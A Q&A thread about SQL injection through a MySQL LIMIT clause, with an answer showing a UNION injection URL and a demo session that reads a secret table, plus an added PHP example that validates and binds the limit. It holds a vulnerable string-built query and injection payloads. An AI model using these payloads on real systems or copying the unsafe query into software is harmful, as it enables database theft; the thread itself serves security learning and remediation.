
Let's assume we have got this query:

SELECT title FROM articles LIMIT 15

We are able to pass any string to the LIMIT clause, but the site does not output errors; in other words, when an error occurs the site shows a blank page.

My question is, can an attacker still perform any kind of SQL injection? Maybe some time-based injection with procedure_analyse?

Thanks in advance.

Connell.O'Donnell
Tadeáš Jílek
  • http://www.edwardl.xyz/2015/02/06/SQL%20Injections%20in%20MySQL%20LIMIT%20clause/ – Hadi Dec 10 '17 at 22:14
  • I've tried the benchmark method, but it loaded immediately, so probably the error was thrown immediately. – Tadeáš Jílek Dec 10 '17 at 22:19
  • Are you unable to modify the source to sanitize the limit clause? What stack are you using? If PHP/MySQL, it might be worth reading https://stackoverflow.com/questions/10014147/limit-keyword-on-mysql-with-prepared-statement – geco17 Dec 10 '17 at 23:05
  • @WilliamBurnham he is not protecting his own site, he is breaking someone else's. Or maybe he's a wannabe pen-tester, but again, protection is not his concern. Otherwise he would have asked straight how to protect a LIMIT clause. From the protection point of view such a question (there is a security hole, I don't care to fix it, I only want to know how to exploit it) makes no sense. – Your Common Sense Dec 12 '17 at 08:24
  • No, actually a pentester has reported this bug he found on our site and wanted to get a reward, which we offer to bug hunters. But he was not able to get data from the database, so I started testing by myself whether I can get through. I just wanted to know if it's exploitable, because in case it's not, we wouldn't pay him a penny, since nobody would be able to get anything from the database. – Tadeáš Jílek Dec 13 '17 at 09:14
  • Injection is injection. If you don't have enough knowledge of SQL to exploit it, it doesn't mean someone else wouldn't have more knowledge and devise an exploit. – Your Common Sense Dec 13 '17 at 15:12

1 Answer

If there is an SQL injection vulnerability like this:

<?php
// Vulnerable pattern: the raw request value is interpolated straight into the SQL text
$UnsafeVariable = $_GET['param'];
$sql = "SELECT title FROM articles LIMIT $UnsafeVariable";

Then an example of SQL injection could be like:

http://mysite.example.com/page.php?param=0 UNION SELECT anything FROM anytable

It's common to use UNION to perpetrate SQL injection. I'm not revealing anything here you can't read on a site like https://owasp.org. You should try to do some reading.


Demo:

mysql> create table MyTable (id int primary key );

mysql> create table SecureTable (secret varchar(50));

mysql> insert into MyTable values (1), (2), (3);

mysql> insert into SecureTable values ('Alohomora');

mysql> select id from MyTable limit 
       /* now the part that is SQL injected */
       1 union select secret from SecureTable;
+-----------+
| id        |
+-----------+
| 1         |
| Alohomora |
+-----------+
Bill Karwin
  • You should try to do some research first, you cannot use UNION in/after a LIMIT clause, look at the SQL query structure. – Tadeáš Jílek Dec 13 '17 at 09:16
  • @TadeášJílek, see demo above, tested on MySQL 5.6.31. – Bill Karwin Dec 13 '17 at 15:05
  • This won't work in MySQL 5.7+ because now you cannot use `UNION` after `LIMIT` unless the whole query before `UNION` is surrounded in parentheses. Something like `(SELECT * FROM table LIMIT 1) UNION SELECT ....`. – Mukarram Khalid Jul 06 '20 at 06:35
  • Thanks for that correction. Regardless, I think the usual advice is still best: **use query parameters**, then you don't have to wonder if it's safe from SQL injection in the current version of MySQL. – Bill Karwin Jul 06 '20 at 15:10
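The question asks whether an unsanitized LIMIT value is exploitable and the answer's closing comment recommends query parameters instead of reasoning about MySQL's grammar. The following is an added example of that fix, written for this page and not taken from the question, the answer or the linked posts: the request value is validated as a bounded integer and then bound with PDO::PARAM_INT, beside the vulnerable string-building pattern from the answer for contrast. The table and column names (articles, title) come from the question; the function names, the MAX_PAGE_SIZE bound, the DSN and the credentials are assumptions for illustration.

```php
<?php
// Added example: hardening a request-supplied LIMIT value.
// articles/title are from the question; everything else here is assumed.

declare(strict_types=1);

const MAX_PAGE_SIZE = 100; // assumed application-specific upper bound

/**
 * The vulnerable pattern from the answer, kept only for comparison:
 * whatever the client sent becomes part of the SQL text.
 */
function buildUnsafeQuery(string $param): string
{
    return "SELECT title FROM articles LIMIT $param";
}

/**
 * Validate the raw request value as an integer in [1, MAX_PAGE_SIZE].
 * Anything that is not a plain integer (a UNION, a comment, a function call,
 * a trailing semicolon) is rejected before it reaches the database driver.
 */
function parseLimit(?string $raw, int $default = 15): int
{
    if ($raw === null || $raw === '') {
        return $default;
    }
    $value = filter_var($raw, FILTER_VALIDATE_INT, [
        'options' => ['min_range' => 1, 'max_range' => MAX_PAGE_SIZE],
    ]);
    if ($value === false) {
        throw new InvalidArgumentException(
            'limit must be an integer between 1 and ' . MAX_PAGE_SIZE
        );
    }
    return $value;
}

/**
 * Run the query with the limit bound as a parameter. PDO::PARAM_INT matters:
 * with emulated prepares a string-typed binding is quoted ('15'), and MySQL
 * does not accept a quoted value in LIMIT.
 */
function fetchTitles(PDO $pdo, int $limit): array
{
    $stmt = $pdo->prepare('SELECT title FROM articles LIMIT ?');
    $stmt->bindValue(1, $limit, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// --- Usage ---------------------------------------------------------------

// Constructed payload in the shape of the answer's demo, to show the contrast.
$payload = '1 UNION SELECT secret FROM SecureTable';
echo buildUnsafeQuery($payload), PHP_EOL;   // the UNION is now part of the statement

try {
    parseLimit($payload);                   // same payload, validated path
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}

// Real request handling: reject bad input with a 400 rather than a blank page.
try {
    $limit = parseLimit($_GET['param'] ?? null);
} catch (InvalidArgumentException $e) {
    http_response_code(400);
    exit('invalid limit');
}

// Assumed DSN and credentials; emulation disabled so the server binds the value.
$pdo = new PDO(
    'mysql:host=localhost;dbname=app;charset=utf8mb4',
    'app_user',
    'app_password',
    [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false,
    ]
);

foreach (fetchTitles($pdo, $limit) as $title) {
    echo $title, PHP_EOL;
}
```

The validation step is what makes the fix independent of the server version discussed in the comments: whether or not the running MySQL accepts UNION after LIMIT, a value that is not an integer in range never becomes SQL, and the integer that does is handed to the driver as a typed parameter rather than spliced into the statement text.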